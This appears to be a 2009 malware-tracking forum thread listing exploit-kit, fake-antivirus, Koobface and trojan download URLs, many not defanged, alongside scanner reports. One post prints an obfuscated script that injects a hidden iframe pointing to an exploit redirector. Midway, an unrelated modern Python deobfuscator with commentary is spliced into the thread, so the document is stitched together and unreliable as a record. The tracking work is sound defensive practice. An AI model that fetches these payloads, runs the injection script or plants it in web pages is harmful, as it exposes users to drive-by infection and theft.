Code: [Select]
hxxp://ldj5.biz/fo/exe.php
VirusTotal: Trojan (http://www.virustotal.com/analisis/92b9ba7ab8d03b9f838879df541a8536) - 11/40 (27.50%)
------------
Code: [Select]
hxxp://pushtutempo.com/uniq3/loads.php?id=88
VirusTotal: Trojan (http://www.virustotal.com/analisis/7c4dfa5c1e6c4f4c30a76d1f511416d6) - 4/40 (10%)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=8fc9779acb3553505810fd40629b4695)
Anubis Report (http://anubis.iseclab.org/?action=result&task_id=1c4b733144334c6c411a26821be3fc633)

connect to:
Code: [Select]
hxxp://verringo.cn/bmngr2/controller.php?action=bot&entity_list=&uid=&first=1&guid=13441600&rnd=3862340
hxxp://verringo.cn/bmngr2/controller.php?action=report&guid=0&rnd=3862340&uid=&entity=1239797538:unique_start
Title: Re: daily something......
Post by: SysAdMini on May 02, 2009, 10:36:43 am
Code: [Select]
dolchepopka.ru/ol/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=c5e81e17c05c73c50ffd675d7932f33d&t=1241260417&type=js

Code: [Select]
http://dolchepopka.ru/1/load.php?id=6
http://www.virustotal.com/de/analisis/b788baee70eaf595b2e8fc726484f8cf 10/40

Code: [Select]
http://dolchepopka.ru/ol/load.php?id=3
http://www.virustotal.com/de/analisis/f95123d5cf3281012c6cc0766b381db1 4/40
Title: Re: daily something......
Post by: Malware-Web-Threats on May 02, 2009, 10:50:16 am
redirects to exploits:
Code: [Select]
hxxp://tds4self.com/sutra/in.cgi?3
Wepawet (http://wepawet.iseclab.org/view.php?hash=8d08793a7fce9b0edc095c038b00967f&t=1241256659&type=js)

exploits:
Code: [Select]
hxxp://webcom-software.net/links/?
hxxp://monkey-squad.net/monkey/index.php
hxxp://monkey-squad.net/monkey/spl/pdf.pdf
hxxp://bronotak.cn/phpmyadmin/index.php?
hxxp://qwu11a.biz/cpanel/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=1458d4c43388d9b059dadc0c86416d39&t=1241256889&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=40c522b5d94eefbd36ef5a027cfe3509&t=1241256556&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=ccb26870cf566e7f980ee4a46fc441b8&t=1241256743&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=6a89a05b812e9f981f08e25a21329dca&t=1241261515&type=js)
Wepawet (http://wepawet.cs.ucsb.edu/view.php?type=js&hash=5a88a5c5fc9f1aa0ca88fbd1beeeba9f&t=1241250527)

trojan:
Code: [Select]
hxxp://monkey-squad.net/monkey/exe.php
hxxp://qwu11a.biz/cpanel/exe.php
VirusTotal (http://www.virustotal.com/analisis/d6d3c79457cce29c2ef3ac44822e59eb) - 27/40 (67.5%)
VirusTotal (http://www.virustotal.com/analisis/d3fb0f65eafb1142d7d22355914dd011) - 11/40 (27.5%)
Title: Re: daily something......
Post by: CkreM on May 03, 2009, 11:52:03 am
Exploit/trojan:
Code: [Select]
carpena.co.uk/cmweb/print/pdf.php
http://wepawet.iseclab.org/view.php?hash=7e78a387e1c5eac47bd34922f4cef85f&t=1241336475&type=js

Koobface: (goes on and off all the time)
Code: [Select]
86.108.36.203/setup.exe
99.50.245.81/setup.exe
http://www.virustotal.com/analisis/bd22d575927bfbf1103713d8718c3a90

Redirects to exploits:
Code: [Select]
freak-vkontakte.biz
contains an iframe to
Code: [Select]
http://basesrv3.net/bin/in.php which is on MDL
Wepawet gives "Invalid hostname" on this domain.
http://jsunpack.jeek.org/dec/go?url=freak-vkontakte.biz
Title: Re: daily something......
Post by: CkreM on May 03, 2009, 03:21:16 pm
koobface:
Code: [Select]
99.149.173.147/setup.exe
http://www.virustotal.com/analisis/600848442c7fed4e8727fc0bc4ee4963

Fake AV:
Code: [Select]
way4scan.info
Title: Re: daily something......
Post by: CkreM on May 04, 2009, 06:53:02 am
Fake AV:
Code: [Select]
truepornmovies.com/scan/?id=259
truepornupload.com/codec.exe
http://www.virustotal.com/analisis/cf4edf2f5335aeb331a25c1267bfd36f

Koobface:
Code: [Select]
75.10.117.174/setup.exe
http://www.virustotal.com/analisis/a2b8e6c4944251f9fc6cf88c36865dd7
Trojan:
Code: [Select]
wc-zone.biz/root.exe
http://www.virustotal.com/analisis/6272b4bfc597e3de994ab200a91c0d44
Trojan:
Code: [Select]
lesbian-girlhard.com/ftp.exe
http://www.virustotal.com/analisis/4d51d8169ba9ad5d74189913c2f89c4b
Trojan Pinch:
Code: [Select]
siski-piski.biz/tarif/pin.exe
http://www.virustotal.com/analisis/ebf13bc733aff1068de51d379f3760da
Trojan:
Code: [Select]
fp3s.biz/6007.exe
http://www.virustotal.com/analisis/56081b98a809bdde7394834e262053cf
Trojan:
Code: [Select]
antivirus.vc/pictures/forum/ftp1.exe
http://www.virustotal.com/analisis/cc07134acd95c61cda816efb94778537
Title: Re: daily something......
Post by: SysAdMini on May 04, 2009, 02:54:35 pm
Code: [Select]
http://cutheatergroup.cn/fl/index.php
http://wepawet.iseclab.org/view.php?hash=3c532cd0cfca29264a4000f6e9476f16&t=1241447080&type=js

Code: [Select]
http://cutheatergroup.cn/fl/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=8078638d68a0675fe56b6e14ebf5425a&t=1241447310&type=js

Code: [Select]
http://cutheatergroup.cn/fl/load.php?id=4
http://cutheatergroup.cn/fl/load.php?id=5
http://www.virustotal.com/analisis/a61bd8c9f1542069d75889f4f9040adc 8/39
Title: Re: daily something......
Post by: Malware-Web-Threats on May 04, 2009, 04:49:07 pm
Redirects to fake codec page
Code: [Select]
hxxp://rhianna.name/vidd/
Wepawet (http://wepawet.iseclab.org/view.php?hash=9bc249ed3be0d9f451ab3a96d0dd4ba4&t=1241454697&type=js)
Fake codec page
Code: [Select]
hxxp://tubecollection2009.com/xxplay.php?id=40009
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
VirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)

downloads:
Code: [Select]
hxxp://imageempires.com/perce/064c5b7bbc854008e18e97e54448fea26776e621b10f2f35f025196defd65efd23a07ce83fb8ef114/80f/perce.jpg
hxxp://picturesoffline.com/item/86ccfb2b2c651048211e775514986e728746d681618fff45b0b539ddffb6de8d73c0aca83fc8ef51e/50a/item.gif
hxxp://pictureswall.com/werber/109/216.jpg
VirusTotal (http://www.virustotal.com/analisis/5455beb9e4d430a802947aff82a28c45) - 28/40 (70%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=129c01269a6adfa745da5c44dbefb2560)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=e49048a38d0757b92a34dff6fc3b3f74)

VirusTotal (http://www.virustotal.com/analisis/7ff08733247ab68a16cba8621f5b403b) - 22/40 (55%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=11ad97792e7b27b543d32662c7752f36a)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=532bd3862d3500f65d3abada38c673c5)

VirusTotal (216.jpg - bb.jpg) (http://www.virustotal.com/analisis/6fd1a269e6d5fa4a25f3b057b57c3591) - 14/40 (35%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1e91fdd1c62e3db5469d63159691a8364)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=3b51dcb1768fd868c6a4c5a03299f807)

perce.jpg
HTTP Conversations:
Quote
216.240.157.91:80 - [imagesrepository.com]
POST /resolution.php
88.214.205.8:80 - [zone-searching.com]
POST /borders.php

item.gif
HTTP Conversations:
Quote
216.240.157.88:80 - [last-visit.com]
GET /cset.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
GET /uget.php?id=g/7bOKwqwd6bH3e9BvR2gC5DOC QMjuEVJXCr1HPwBvUhUpfkUo9FCofikcbokMC3jvn7vnlOfsSb ApC9D84VB4pDwQzKDIuNNR7WpvFBlUMPZcyrW3O9vf9lli2EaM wb5lhGwWRkdZIg74dRBmaah/YZsBERxLkPueyDpqK/ml4U4Vlw 96siO09AkAzfqTK81K4Kpw4ntiIe0J7ZDQvPKOlWVMEo9vNlcI..
Title: Re: daily something......
Post by: SysAdMini on May 04, 2009, 05:13:31 pm
Trojan:
Code: [Select]
hxxp://kvm-softwares.com/softwarefortubeview.40009.exe
VirusTotal (http://www.virustotal.com/analisis/b6082ec0b0c912976887d0549ed5a315) - 10/40 (25%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=1f91f09153120c524a56fa4930c32dbe3)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=b179b7959a87bd316d7f7f11a993e037)

see also:

xxx-softwares.com
cool-softtech.com
rtfm-softweares.com
xyu-softportal.com
xepace-software.com
ce-softwares.com
dig-softportals.com
pac-softportal.com
Title: Re: daily something......
Post by: Malware-Web-Threats on May 04, 2009, 05:56:07 pm
This IP hosts similar websites with the same payload: http://www.robtex.com/ip/195.88.80.41.html

can be downloaded using "/softwarefortubeview.40007.exe", "/softwarefortubeview.40008.exe", etc.

Code: [Select]
hxxp://xxx-softwares.com/softwarefortubeview.40009.exe
hxxp://cool-softtech.com/softwarefortubeview.40009.exe
hxxp://rtfm-softweares.com/softwarefortubeview.40009.exe
hxxp://xyu-softportal.com/softwarefortubeview.40009.exe
hxxp://xepace-software.com/softwarefortubeview.40009.exe
hxxp://ce-softwares.com/softwarefortubeview.40009.exe
hxxp://dig-softportals.com/softwarefortubeview.40009.exe
hxxp://pac-softportal.com/softwarefortubeview.40009.exe

Quote
File size: 65536 bytes
MD5...: b179b7959a87bd316d7f7f11a993e037

VirusTotal (http://www.virustotal.com/analisis/8f2b9ad6c0782cc4f50921d16061056a)

Title: Re: daily something......
Post by: Malware-Web-Threats on May 04, 2009, 06:08:54 pm
They also have the same structure with "promo.exe"

Code: [Select]
hxxp://xxx-softwares.com/promo.exe
hxxp://cool-softtech.com/promo.exe
hxxp://rtfm-softweares.com/promo.exe
hxxp://xyu-softportal.com/promo.exe
hxxp://xepace-software.com/promo.exe
hxxp://ce-softwares.com/promo.exe
hxxp://dig-softportals.com/promo.exe
hxxp://pac-softportal.com/promo.exe

Quote
File size: 74752 bytes
MD5: 951f3ee90eb3576325fa1920e3da678c

VirusTotal (http://www.virustotal.com/analisis/4551c0b455166626a3034c22888a856d) - 29/39 (74.36%)
Anubis (http://anubis.iseclab.org/?action=result&task_id=101a845c61bdcac74392ebc2f97208986&call=first)
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=5863553963378030c5223e76bca37da1)

HTTP Conversations:
Quote
216.240.148.9:80 - dfdsfdsfcdsc.com
Request: GET /bbb.php
Request: GET /ccc_2.php?uid=6cbbc5081e7548e276611ff5059df6ed30c8f8f1&aid=&os=513
Title: Re: daily something......
Post by: Malware-Web-Threats on May 05, 2009, 01:29:03 am
related: teyrebuf[.]cn, gukgifoc[.]cn, beelposttraning[.]ru, dastrealworld[.]ru

redirects to exploits:
Code: [Select]
hxxp://dastrealworld.ru/denunreal.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=10fc58eeacba6fa759b1305d1d30610d&t=1241486137&type=js)

the script that came with this one
Quote
<script>
document.write(unescape("%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"));
</script>
<script>
eval(unescape("%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));
</script>

the iframe:
Quote
<style type="text/css"> iframe {width:0;height:0;border:0;} </style>

var b24 = String.fromCharCode(104,116,116,112,58,47,47,100,97,115,116,114,101,97,108,119,111,114,108,100,46,114,117,47,100,101,110,117,110,114,101,97,108,46,104,116,109,108);document.write(unescape('<iframe src=\''+b24+'\'></iframe>'));

Found here:
http://wepawet.iseclab.org/view.php?hash=0495bd4385abfecfa1b5085b9027777d&t=1241485592&type=js

others on the same site

Code: [Select]
hxxp://dastrealworld.ru/underworld.html
hxxp://dastrealworld.ru/cover.html
Wepawet (http://wepawet.iseclab.org/view.php?hash=13648af19411e61a80007ca84c1b2ab5&t=1241486057&type=js)
Wepawet (http://wepawet.iseclab.org/view.php?hash=3caa65b128918f67b6d2d28b2d8e36b4&t=1241486229&type=js)

pdf exploits:
Code: [Select]
hxxp://gukgifoc.cn/nuc/spl/pdf.pdf
Wepawet (http://wepawet.iseclab.org/view.php?hash=60f130f89de4dc9c4bc40334423ce7d8&t=1241079304&type=js)
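Taking apart the two-stage unescape()/String.fromCharCode loader quoted in the post above, as an added example in Python; this is not code from the thread or from any tool it links. The sample input is the two unescape() arguments copied from the quoted script; the function names, the regex-based folding of fromCharCode calls and the variable lookup for the iframe src are my own assumptions about how such a loader is usually unwrapped by hand, not a JavaScript interpreter.

```python
"""Decode a percent-escaped / fromCharCode iframe loader and report the URL
it injects. Standard library only, no network access, no JS evaluation."""
import re
from typing import Dict, List

# Constructed sample input: the two unescape() arguments copied from the
# obfuscated <script> blocks quoted in the post (style hider, then loader).
STYLE_BLOB = (
    "%3c%73%74%79%6c%65%20%74%79%70%65%3d%22%74%65%78%74%2f%63%73%73%22%3e%20"
    "%69%66%72%61%6d%65%20%7b%77%69%64%74%68%3a%30%3b%68%65%69%67%68%74%3a%30%3b"
    "%62%6f%72%64%65%72%3a%30%3b%7d%20%3c%2f%73%74%79%6c%65%3e"
)
LOADER_BLOB = (
    "%76%61%72%20%62%32%34%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28"
    "%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c"
    "%31%30%30%2c%39%37%2c%31%31%35%2c%31%31%36%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c"
    "%31%31%39%2c%31%31%31%2c%31%31%34%2c%31%30%38%2c%31%30%30%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c"
    "%31%30%30%2c%31%30%31%2c%31%31%30%2c%31%31%37%2c%31%31%30%2c%31%31%34%2c%31%30%31%2c%39%37%2c%31%30%38%2c"
    "%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b"
    "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27"
    "%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%62%32%34%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"
)

# Legacy JS unescape(): %XX is one byte, %uXXXX one UTF-16 code unit,
# everything else is passed through untouched.
_PCT = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def js_unescape(s: str) -> str:
    """Stage 1: undo the percent-encoding that hides the loader from grep."""
    return _PCT.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


_FCC = re.compile(r"String\.fromCharCode\(\s*([0-9,\s]*?)\s*\)")


def resolve_fromcharcode(js: str) -> str:
    """Stage 2: fold String.fromCharCode(104,116,...) into a quoted literal."""
    def build(m: "re.Match[str]") -> str:
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return "'" + "".join(chr(c) for c in codes) + "'"
    return _FCC.sub(build, js)


def deobfuscate(blob: str) -> str:
    """Both stages: what the browser would hand to eval()/document.write()."""
    return resolve_fromcharcode(js_unescape(blob))


# Assumed conventions (hypothetical, fitted to this loader): a single-quoted
# string assigned with `var`, and an iframe whose src is either a literal or
# a variable spliced in with `+`.
_VAR = re.compile(r"var\s+(\w+)\s*=\s*'([^']*)'")
_SRC_VAR = re.compile(r"<iframe\s+src=\\?['\"]{1,2}\s*\+\s*(\w+)\s*\+")
_SRC_LIT = re.compile(r"<iframe\s+src=['\"]([^'\"]+)['\"]")


def extract_iframe_targets(js: str) -> List[str]:
    """Return the URLs that would land in an injected <iframe src=...>."""
    variables: Dict[str, str] = dict(_VAR.findall(js))
    targets = [variables[name] for name in _SRC_VAR.findall(js) if name in variables]
    targets.extend(_SRC_LIT.findall(js))
    return targets


_UNESCAPE_ARG = re.compile(r"unescape\(\s*([\"'])(.*?)\1\s*\)")


def analyze_script(html: str) -> List[str]:
    """Pull every unescape("...") argument out of a captured page, decode it,
    and collect the iframe targets (deduplicated, in order of appearance)."""
    found: List[str] = []
    for _quote, blob in _UNESCAPE_ARG.findall(html):
        for url in extract_iframe_targets(deobfuscate(blob)):
            if url not in found:
                found.append(url)
    return found


# Constructed page fragment reproducing the quoted <script> layout.
SAMPLE_HTML = (
    '<script>\ndocument.write(unescape("' + STYLE_BLOB + '"));\n</script>\n'
    '<script>\neval(unescape("' + LOADER_BLOB + '"));\n</script>\n'
)

if __name__ == "__main__":
    print(js_unescape(STYLE_BLOB))
    print(deobfuscate(LOADER_BLOB))
    print(analyze_script(SAMPLE_HTML))
```

Running it prints the decoded stylesheet (the zero-size iframe rule), the resolved loader with `b24` as a plain string, and the single target it injects, which is the denunreal.html URL listed at the top of the post. The same functions accept any captured `unescape("...")` argument, and `analyze_script()` walks a whole page with several such blocks. The decoder only folds `%XX`/`%uXXXX` escapes and `String.fromCharCode`; a sample that adds arithmetic on the char codes, string reversal or a second eval layer needs a real sandbox such as the Wepawet reports the thread links to.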
Title: Re: daily something......
Post by: RS-232 on May 05, 2009, 10:00:25 am
Quote
hxxp://totalweightlosscenter.com/images/go.php?sid=1
hxxp://nikolaevere.com/images/data/load.php
- - - - - - - - - - -
Pharmacy crap:
http://www.robtex.com/ip/203.117.111.123.html
- - - - - - - - - - -
Hadn't seen this lame trick in quite some time...
Quote
hxxp://www.mediapartner.by.ru/bunners/banunicom.gif
http://www.virustotal.com/analisis/228b180b2318b8477201eea15d09a0bb
Result: 7/40 (17.5%)
- - - - - - - - - - -
Quote
hxxp://update.dom11z.cn/cache/readme.pdf
http://www.virustotal.com/analisis/54bcdbcb1f52dc418c5af7fd965eb75e

Interesting IP... lots of domains there seem to redirect to update.dom11z.cn above, one way or another:
http://www.bfk.de/bfk_dnslogger.html?query=213.182.197.230#result
Title: Re: daily something......
Post by: RS-232 on May 05, 2009, 01:55:10 pm
From the 213.182.197.2xx neighbourhood again...

Quote
hxxp://hostyapics.com/video/988/install_flash_player.exe
http://www.virustotal.com/analisis/72fa934c6d4d76a80a2d714d3586cc8b
Result: 4/40 (10%)
http://anubis.iseclab.org/?action=result&task_id=170666b5c144e68b4b9008d22642304c4&format=html
---->
hxxp://members.chello.pl/i.lemecha/index1.gif
http://www.virustotal.com/analisis/a9bb65e395a3f6a43ef8bec2790d9697
Result: 4/39 (10.26%)
http://anubis.iseclab.org/?action=result&task_id=1451aadd8279355c469500473ed1e00b3&format=html
--->
(Anubis results in short... I've commented only on the ones that have a somewhat lousy detection rate):
hxxp://adimsceibh.com/progs/eqkxyll/cziwjnoo.php?adv=adv557
hxxp://adimsceibh.com/progs/eqkxyll/vblymjwx.php
hxxp://adimsceibh.com/progs/eqkxyll/bueesf.php
hxxp://adimsceibh.com/progs/eqkxyll/rtqrrfss.php
hxxp://adimsceibh.com/progs/eqkxyll/fczzm.php
hxxp://adimsceibh.com/progs/eqkxyll/hrnbopcqde.php
hxxp://adimsceibh.com/progs/eqkxyll/yvscpd.php // Result: 4/40 (10%) - Pinch
hxxp://adimsceibh.com/progs/eqkxyll/gqrrfft // Result: 9/41 (21.96%) - Vundo
Title: Re: daily something......
Post by: CkreM on May 06, 2009, 07:01:34 am
PDF exploits (all the same, on IP 91.212.41.119):
Code: [Select]
nicdaheb.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=d0151c3192d10713487fff545fab19ff&t=1241590847&type=js
Code: [Select]
sehmadac.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=e0ee4d85cd32c9d38378686a65413636&t=1241591188&type=js
Code: [Select]
vavgurac.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=de5856cb0d29edcbf0151722249c73f8&t=1241591259&type=js
Code: [Select]
tixleloc.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=614e78b7f2bf16d7fc76ebfd876e57d5&t=1241591442&type=js
Code: [Select]
teyrebuf.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=371a870529fc3101c03eeee07e93124c&t=1241591523&type=js
Code: [Select]
tukhemaj.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=251584c0c643dcfe6ba8ec2842547b76&t=1241591544&type=js
Code: [Select]
tixwagoq.cn/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=aee55ad675950b610765dc60a7772a9d&t=1241591577&type=js

all lead to this trojan:
Code: [Select]
nicdaheb.cn/nuc/exe.php
http://www.virustotal.com/analisis/3b2a31a93f84f0b540f14abbe54a89e0

Rogue:
Code: [Select]
antivguardian.com
antiawarepro.com
antivirprof.com

Fake AV:
Code: [Select]
stats.swpstats.com/getfile?id=26
http://www.virustotal.com/analisis/ed4436020c7fe8208e13d0b19cda10db

Fake AV:
Code: [Select]
free-webscaners.com/scan
Koobface:
Code: [Select]
64.4.224.45/setup.exe
69.154.143.170/setup.exe
75.54.183.125/setup.exe
62.98.53.173/setup.exe
74.216.59.250/setup.exe
http://www.virustotal.com/analisis/6914e7738d5af094ac7105a4aa087a60

Trojan:
Code: [Select]
http://down.yyduowan.net/2.exe
http://www.virustotal.com/analisis/b008ea75feb56250e0124be694180c2d
Trojan:
Code: [Select]
svarkon.ru/update.exe
http://www.virustotal.com/analisis/f8f886d3907495a15f08d982bbae11b2
Title: Re: daily something......
Post by: XiTri on May 06, 2009, 08:42:15 am
Code: [Select]
http://72.29.67.139/knb/megatrader-2k_20090505.exe

http://vilko.biz/opi/index.php
http://vilko.biz/opi/load.php
http://vilko.biz/opi/cache/readme.pdf

http://vilko.biz/myy/index.php
http://vilko.biz/myy/load.php
http://vilko.biz/myy/cache/readme.pdf
Title: Re: daily something......
Post by: CkreM on May 06, 2009, 09:35:28 pm
Exploit: (downloaded file on MDL)
Code: [Select]
liteautobestguide.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=66fec491755fc72f675563dd6c4fc20a&t=1241645815&type=js

Also a trojan on that domain:
Code: [Select]
liteautobestguide.cn/load.php
http://www.virustotal.com/analisis/bfbac430fbb0fb3096239b7c98d384ac

Koobface:
Code: [Select]
65.75.82.150/setup.exe
98.203.149.224/setup.exe
trojan:
Code: [Select]
qqcfwaigua.com/cfwg.exe
http://www.virustotal.com/analisis/7403d735e83451ef65863b15b832d9ae
Title: Re: daily something......
Post by: CkreM on May 07, 2009, 03:48:19 pm
Koobface:
Code: [Select]
70.105.181.119/setup.exe
98.228.135.203/setup.exe
129.119.193.233/setup.exe
http://www.virustotal.com/analisis/89e1b7e8bf4f2be5773a1000a8dd3817
Title: Re: daily something......
Post by: CkreM on May 11, 2009, 03:40:51 am
Koobface:
Code: [Select]
86.121.7.57/setup.exe
69.247.67.92/setup.exe
Trojan:
Code: [Select]
greatjobdealuk.info/isp/upload/socksbot.exe http://www.virustotal.com/analisis/ef89795fe5c6a42f855e37216328e0cb
Title: Re: daily something......
Post by: Malware-Web-Threats on May 11, 2009, 04:15:15 pm
216.240.143.7
Fake codec page:
Code: [Select]
hxxp://better-tube-show.com/xxplay.php?id=40009
Registrant: Bobby Macleod (bobbym806@ gmail.com)

216.240.148.9
Returns malware urls:
Code: [Select]
hxxp://hjtktyjyhhn.com/fff9999.php?aid=0&uid=00cd1a40d41d8cd98f00b204e9800998ecf8427e&os=512
Registrant: Jameson Jack (cyber38462@ hotmail.com)

Quote
hxxp://imageempires.com/perce/8020ac6db14a14e0ed94c17da86c8d0938cff0c02ba29014aee9a81000a9b998de6c0f98a422879eb/400/perce.jpg
hxxp://picturesoffline.com/item/60b08c6de14a64b07d04519db83c3dc948ef80e0bbf2e054ae09d830c0194928cecc8fb814f2678e0/b01/item.gif
hxxp://pictureswall.com/werber/b0f/216.jpg
hxxp://sdfv-programs.com/file.exe
ThreatExpert (http://www.threatexpert.com/report.aspx?md5=f621255677a794be1390e48b47823fa0)

70.86.3.198 [c6.3.5646.static.theplanet.com]
Trojan Clicker:
Code: [Select]
hxxp://jump1.info/xxx.exe
hxxp://xxx.host800.com/xxx.exe
VirusTotal (http://www.virustotal.com/analisis/4abfb028c31a9979aaa09b9de52b7d5f) - 24/40 (60.00%)
Registrant: yong wang (edizhu@ hotmail.com)
Registrant: youguang wang (edisoho@ hotmail.com)

Trojan GameThief OnLineGames:
61.174.68.24
Code: [Select]
hxxp://www.361safae.cn/img/sri1.gif
hxxp://www.361safae.cn/img/sri2.gif
hxxp://www.361safae.cn/img/sri3.gif
hxxp://www.361safae.cn/img/sri4.gif
hxxp://www.361safae.cn/img/sri5.gif
hxxp://www.361safae.cn/img/sri6.gif
hxxp://www.361safae.cn/img/sri7.gif
hxxp://www.361safae.cn/img/sri8.gif
hxxp://www.361safae.cn/img/sri9.gif
Registrant: Xie Yang (ylaoda88@ 163.com)
VirusTotal (http://www.virustotal.com/analisis/e47da00f08d79ea42c45d7f01ed88291)
VirusTotal (http://www.virustotal.com/analisis/bb63e441554489f062be7dbdb5ee5fc0)
VirusTotal (http://www.virustotal.com/analisis/542d74d0849cea1a0aa0d673d9fddbf3)
VirusTotal (http://www.virustotal.com/analisis/f3d8ce321d53b6004d629c5e976790c0)
VirusTotal (http://www.virustotal.com/analisis/9b8a676e815e3feb25b0fe89c1220c72)
VirusTotal (http://www.virustotal.com/analisis/ad7c98b2bcc7454278e9b89cdce1962c)
VirusTotal (http://www.virustotal.com/analisis/164799816ed1a0455861268b3176bcc8)
VirusTotal (http://www.virustotal.com/analisis/e57ffc5b955bce7a44a1f410d2b0e9bf)

60.173.10.53
Code: [Select]
hxxp://ipshougou.com/down/qqma.exe
Registrant: phyto, phyto  (support@ tongyong.net)
VirusTotal (http://www.virustotal.com/analisis/2f0359e1a9c783731865f01544a69c62)
Title: Re: daily something......
Post by: CM_MWR on May 12, 2009, 08:09:50 am
Drivebys

Code: [Select]
http://sdfv-programs.com/file.exe
http://wtopcompany.ru/cms/load.php
http://bdsm-movies.info/33/load.php
http://p0rn-movies.com/77/load.php
http://clicks100.ru/cms/index.php
http://clicks100.ru/cms/load.php?id=0
http://clicks100.ru/tmp/in.php?i=20661JNE1C4793&o=2
http://clicks100.ru/top100/iframe.php
http://beelposttraning.ru/s/default.cgi
http://beelposttraning.ru/s/in.cgi?3
http://dastrealworld.ru/dance.html
http://dastrealworld.ru/denunreal.html
http://dastrealworld.ru/maufeorl.html
http://dastrealworld.ru/ne/in.php
http://dwnld.offer-provider.com/secure/bec4d39b22049ff339f0b9e576c5299f/4a054ac1/vsm/vsm_free_setup.exe
http://dwnld.offer-provider.com/secure/ef6ca9ceb9b5bd94db5fa8bdd7889251/4a054035/vsm/vsm_free_setup.exe
http://internetnamestore.cn/cache/flash.swf
http://internetnamestore.cn/cache/readme.pdf
http://internetnamestore.cn/in.cgi?income23
http://internetnamestore.cn/in.cgi?income27
http://internetnamestore.cn/index.php
http://internetnamestore.cn/load.php?id=0
http://internetnamestore.cn/load.php?id=8
http://operative.cc/liveinternet/index.php
http://operative.cc/liveinternet/load.php?id=4679
http://operative.cc/liveinternet/pdf.php?id=4679
http://teyrebuf.cn/nuc/%E0%AC%8B%E0%AC%8BAAAAAAAAAAAAAAAAAAAAAAAAA
http://teyrebuf.cn/nuc/exe.php
http://teyrebuf.cn/nuc/index.php
http://teyrebuf.cn/nuc/spl/pdf.pdf
http://teyrebuf.cn/s/in.cgi?10
http://updateserver.info/cmp/controller.php?&ver=8&uid=dc2335ef&aid=astakiller&adm=adm&inst=1&br=IEXPLORE.EXE&os=XPSP2
http://updateserver.info/loads/astakiller.dll
http://zone2tech.info/skp66.exe

Mebroot

Code: [Select]
http://ijpabevvif.com/ld/gnh_2/gnh2.exe
http://ijpabevvif.com/ld/gnh_3/gnh3.exe
http://ijpabevvif.com/ld/gnh_4/gnh4.exe
